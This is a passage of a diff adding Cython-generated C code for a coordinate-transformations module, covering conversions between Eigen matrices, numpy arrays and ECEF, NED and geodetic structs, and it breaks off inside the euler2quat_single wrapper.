+ * returns the unit part of the dtype for a numpy datetime64 object. + * """ + * return (obj).obmeta.base # <<<<<<<<<<<<<< + */ + __pyx_r = ((NPY_DATETIMEUNIT)((PyDatetimeScalarObject *)__pyx_v_obj)->obmeta.base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":24 + * cimport numpy as np + * + * cdef np.ndarray[double, ndim=2] matrix2numpy(Matrix3 m): # <<<<<<<<<<<<<< + * return np.array([ + * [m(0, 0), m(0, 1), m(0, 2)], + */ + +static PyArrayObject *__pyx_f_6common_15transformations_15transformations_matrix2numpy(Eigen::Matrix3d __pyx_v_m) { + PyArrayObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("matrix2numpy", 0); + + /* "common/transformations/transformations.pyx":25 + * + * cdef np.ndarray[double, ndim=2] matrix2numpy(Matrix3 m): + * return np.array([ # <<<<<<<<<<<<<< + * [m(0, 0), m(0, 1), m(0, 2)], + * [m(1, 0), m(1, 1), m(1, 2)], + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_np); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_array); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":26 + * cdef np.ndarray[double, ndim=2] matrix2numpy(Matrix3 m): + * return np.array([ + * [m(0, 0), m(0, 1), m(0, 2)], # <<<<<<<<<<<<<< + * [m(1, 0), m(1, 1), m(1, 2)], + * [m(2, 0), m(2, 1), m(2, 2)], + */ + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_m(0, 0)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 26, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_m(0, 1)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 26, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_m(0, 2)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 26, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyList_New(3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 26, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_6, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_6, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_6, 2, __pyx_t_5); + __pyx_t_2 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + + /* "common/transformations/transformations.pyx":27 + * return np.array([ + * [m(0, 0), m(0, 1), m(0, 2)], + * [m(1, 0), m(1, 1), m(1, 2)], # <<<<<<<<<<<<<< + * [m(2, 0), m(2, 1), m(2, 2)], + * ]) + */ + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_m(1, 0)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_m(1, 1)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_m(1, 2)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_7 = PyList_New(3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_7, 0, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_7, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_7, 2, __pyx_t_2); + __pyx_t_5 = 0; + __pyx_t_4 = 0; + __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":28 + * [m(0, 0), m(0, 1), m(0, 2)], + * [m(1, 0), m(1, 1), m(1, 2)], + * [m(2, 0), m(2, 1), m(2, 2)], # <<<<<<<<<<<<<< + * ]) + * + */ + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_m(2, 0)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_m(2, 1)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_m(2, 2)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_8 = PyList_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_8, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_8, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_8, 2, __pyx_t_5); + __pyx_t_2 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + + /* "common/transformations/transformations.pyx":25 + * + * cdef np.ndarray[double, ndim=2] matrix2numpy(Matrix3 m): + * return np.array([ # <<<<<<<<<<<<<< + * [m(0, 0), m(0, 1), m(0, 2)], + * [m(1, 0), m(1, 1), m(1, 2)], + */ + __pyx_t_5 = PyList_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_6); + PyList_SET_ITEM(__pyx_t_5, 0, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyList_SET_ITEM(__pyx_t_5, 1, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_8); + PyList_SET_ITEM(__pyx_t_5, 2, __pyx_t_8); + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_t_8 = 0; + __pyx_t_8 = NULL; + __pyx_t_9 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_9 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_8, __pyx_t_5}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_9, 1+__pyx_t_9); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 25, __pyx_L1_error) + __pyx_r = ((PyArrayObject *)__pyx_t_1); + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":24 + * cimport numpy as np + * + * cdef np.ndarray[double, ndim=2] matrix2numpy(Matrix3 m): # <<<<<<<<<<<<<< + * return np.array([ + * [m(0, 0), m(0, 1), m(0, 2)], + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("common.transformations.transformations.matrix2numpy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":31 + * ]) + * + * cdef Matrix3 numpy2matrix(np.ndarray[double, ndim=2, mode="fortran"] m): # <<<<<<<<<<<<<< + * assert m.shape[0] == 3 + * assert m.shape[1] == 3 + */ + +static Eigen::Matrix3d __pyx_f_6common_15transformations_15transformations_numpy2matrix(PyArrayObject *__pyx_v_m) { + __Pyx_LocalBuf_ND __pyx_pybuffernd_m; + __Pyx_Buffer __pyx_pybuffer_m; + Eigen::Matrix3d __pyx_r; + __Pyx_RefNannyDeclarations + npy_intp *__pyx_t_1; + int __pyx_t_2; + char *__pyx_t_3; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("numpy2matrix", 0); + __pyx_pybuffer_m.pybuffer.buf = NULL; + __pyx_pybuffer_m.refcount = 0; + __pyx_pybuffernd_m.data = NULL; + __pyx_pybuffernd_m.rcbuffer = &__pyx_pybuffer_m; + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_m.rcbuffer->pybuffer, (PyObject*)__pyx_v_m, &__Pyx_TypeInfo_double, PyBUF_FORMAT| PyBUF_F_CONTIGUOUS, 2, 0, __pyx_stack) == -1)) __PYX_ERR(0, 31, __pyx_L1_error) + } + __pyx_pybuffernd_m.diminfo[0].strides = __pyx_pybuffernd_m.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_m.diminfo[0].shape = __pyx_pybuffernd_m.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_m.diminfo[1].strides = __pyx_pybuffernd_m.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_m.diminfo[1].shape = __pyx_pybuffernd_m.rcbuffer->pybuffer.shape[1]; + + /* "common/transformations/transformations.pyx":32 + * + * cdef Matrix3 numpy2matrix(np.ndarray[double, ndim=2, mode="fortran"] m): + * assert m.shape[0] == 3 # <<<<<<<<<<<<<< + * assert m.shape[1] == 3 + * return Matrix3(m.data) + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_m)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 32, __pyx_L1_error) + __pyx_t_2 = ((__pyx_t_1[0]) == 3); + if (unlikely(!__pyx_t_2)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 32, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 32, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":33 + * cdef Matrix3 numpy2matrix(np.ndarray[double, ndim=2, mode="fortran"] m): + * assert m.shape[0] == 3 + * assert m.shape[1] == 3 # <<<<<<<<<<<<<< + * return Matrix3(m.data) + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_m)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 33, __pyx_L1_error) + __pyx_t_2 = ((__pyx_t_1[1]) == 3); + if (unlikely(!__pyx_t_2)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 33, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 33, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":34 + * assert m.shape[0] == 3 + * assert m.shape[1] == 3 + * return Matrix3(m.data) # <<<<<<<<<<<<<< + * + * cdef ECEF list2ecef(ecef): + */ + __pyx_t_3 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_m)); if (unlikely(__pyx_t_3 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 34, __pyx_L1_error) + __pyx_r = Eigen::Matrix3d(((double *)__pyx_t_3)); + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":31 + * ]) + * + * cdef Matrix3 numpy2matrix(np.ndarray[double, ndim=2, mode="fortran"] m): # <<<<<<<<<<<<<< + * assert m.shape[0] == 3 + * assert m.shape[1] == 3 + */ + + /* function exit code */ + __pyx_L1_error:; + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_m.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("common.transformations.transformations.numpy2matrix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_m.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":36 + * return Matrix3(m.data) + * + * cdef ECEF list2ecef(ecef): # <<<<<<<<<<<<<< + * cdef ECEF e; + * e.x = ecef[0] + */ + +static struct ECEF __pyx_f_6common_15transformations_15transformations_list2ecef(PyObject *__pyx_v_ecef) { + struct ECEF __pyx_v_e; + struct ECEF __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("list2ecef", 0); + + /* "common/transformations/transformations.pyx":38 + * cdef ECEF list2ecef(ecef): + * cdef ECEF e; + * e.x = ecef[0] # <<<<<<<<<<<<<< + * e.y = ecef[1] + * e.z = ecef[2] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ecef, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 38, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_e.x = __pyx_t_2; + + /* "common/transformations/transformations.pyx":39 + * cdef ECEF e; + * e.x = ecef[0] + * e.y = ecef[1] # <<<<<<<<<<<<<< + * e.z = ecef[2] + * return e + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ecef, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 39, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 39, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_e.y = __pyx_t_2; + + /* "common/transformations/transformations.pyx":40 + * e.x = ecef[0] + * e.y = ecef[1] + * e.z = ecef[2] # <<<<<<<<<<<<<< + * return e + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ecef, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_e.z = __pyx_t_2; + + /* "common/transformations/transformations.pyx":41 + * e.y = ecef[1] + * e.z = ecef[2] + * return e # <<<<<<<<<<<<<< + * + * cdef NED list2ned(ned): + */ + __pyx_r = __pyx_v_e; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":36 + * return Matrix3(m.data) + * + * cdef ECEF list2ecef(ecef): # <<<<<<<<<<<<<< + * cdef ECEF e; + * e.x = ecef[0] + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.list2ecef", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":43 + * return e + * + * cdef NED list2ned(ned): # <<<<<<<<<<<<<< + * cdef NED n; + * n.n = ned[0] + */ + +static struct NED __pyx_f_6common_15transformations_15transformations_list2ned(PyObject *__pyx_v_ned) { + struct NED __pyx_v_n; + struct NED __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("list2ned", 0); + + /* "common/transformations/transformations.pyx":45 + * cdef NED list2ned(ned): + * cdef NED n; + * n.n = ned[0] # <<<<<<<<<<<<<< + * n.e = ned[1] + * n.d = ned[2] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ned, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 45, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 45, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_n.n = __pyx_t_2; + + /* "common/transformations/transformations.pyx":46 + * cdef NED n; + * n.n = ned[0] + * n.e = ned[1] # <<<<<<<<<<<<<< + * n.d = ned[2] + * return n + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ned, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_n.e = __pyx_t_2; + + /* "common/transformations/transformations.pyx":47 + * n.n = ned[0] + * n.e = ned[1] + * n.d = ned[2] # <<<<<<<<<<<<<< + * return n + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ned, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 47, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_n.d = __pyx_t_2; + + /* "common/transformations/transformations.pyx":48 + * n.e = ned[1] + * n.d = ned[2] + * return n # <<<<<<<<<<<<<< + * + * cdef Geodetic list2geodetic(geodetic): + */ + __pyx_r = __pyx_v_n; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":43 + * return e + * + * cdef NED list2ned(ned): # <<<<<<<<<<<<<< + * cdef NED n; + * n.n = ned[0] + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.list2ned", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":50 + * return n + * + * cdef Geodetic list2geodetic(geodetic): # <<<<<<<<<<<<<< + * cdef Geodetic g + * g.lat = geodetic[0] + */ + +static struct Geodetic __pyx_f_6common_15transformations_15transformations_list2geodetic(PyObject *__pyx_v_geodetic) { + struct Geodetic __pyx_v_g; + struct Geodetic __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("list2geodetic", 0); + + /* "common/transformations/transformations.pyx":52 + * cdef Geodetic list2geodetic(geodetic): + * cdef Geodetic g + * g.lat = geodetic[0] # <<<<<<<<<<<<<< + * g.lon = geodetic[1] + * g.alt = geodetic[2] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_geodetic, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 52, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 52, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_g.lat = __pyx_t_2; + + /* "common/transformations/transformations.pyx":53 + * cdef Geodetic g + * g.lat = geodetic[0] + * g.lon = geodetic[1] # <<<<<<<<<<<<<< + * g.alt = geodetic[2] + * return g + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_geodetic, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 53, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_g.lon = __pyx_t_2; + + /* "common/transformations/transformations.pyx":54 + * g.lat = geodetic[0] + * g.lon = geodetic[1] + * g.alt = geodetic[2] # <<<<<<<<<<<<<< + * return g + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_geodetic, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 54, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 54, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_g.alt = __pyx_t_2; + + /* "common/transformations/transformations.pyx":55 + * g.lon = geodetic[1] + * g.alt = geodetic[2] + * return g # <<<<<<<<<<<<<< + * + * def euler2quat_single(euler): + */ + __pyx_r = __pyx_v_g; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":50 + * return n + * + * cdef Geodetic list2geodetic(geodetic): # <<<<<<<<<<<<<< + * cdef Geodetic g + * g.lat = geodetic[0] + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.list2geodetic", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":57 + * return g + * + * def euler2quat_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Quaternion q = euler2quat_c(e) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_1euler2quat_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_1euler2quat_single = {"euler2quat_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_1euler2quat_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_1euler2quat_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_euler = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("euler2quat_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_euler,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_euler)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 57, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "euler2quat_single") < 0)) __PYX_ERR(0, 57, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_euler = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("euler2quat_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 57, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.euler2quat_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_euler2quat_single(__pyx_self, __pyx_v_euler); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_euler2quat_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_euler) { + Eigen::Vector3d __pyx_v_e; + Eigen::Quaterniond __pyx_v_q; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + double __pyx_t_3; + double __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("euler2quat_single", 0); + + /* "common/transformations/transformations.pyx":58 + 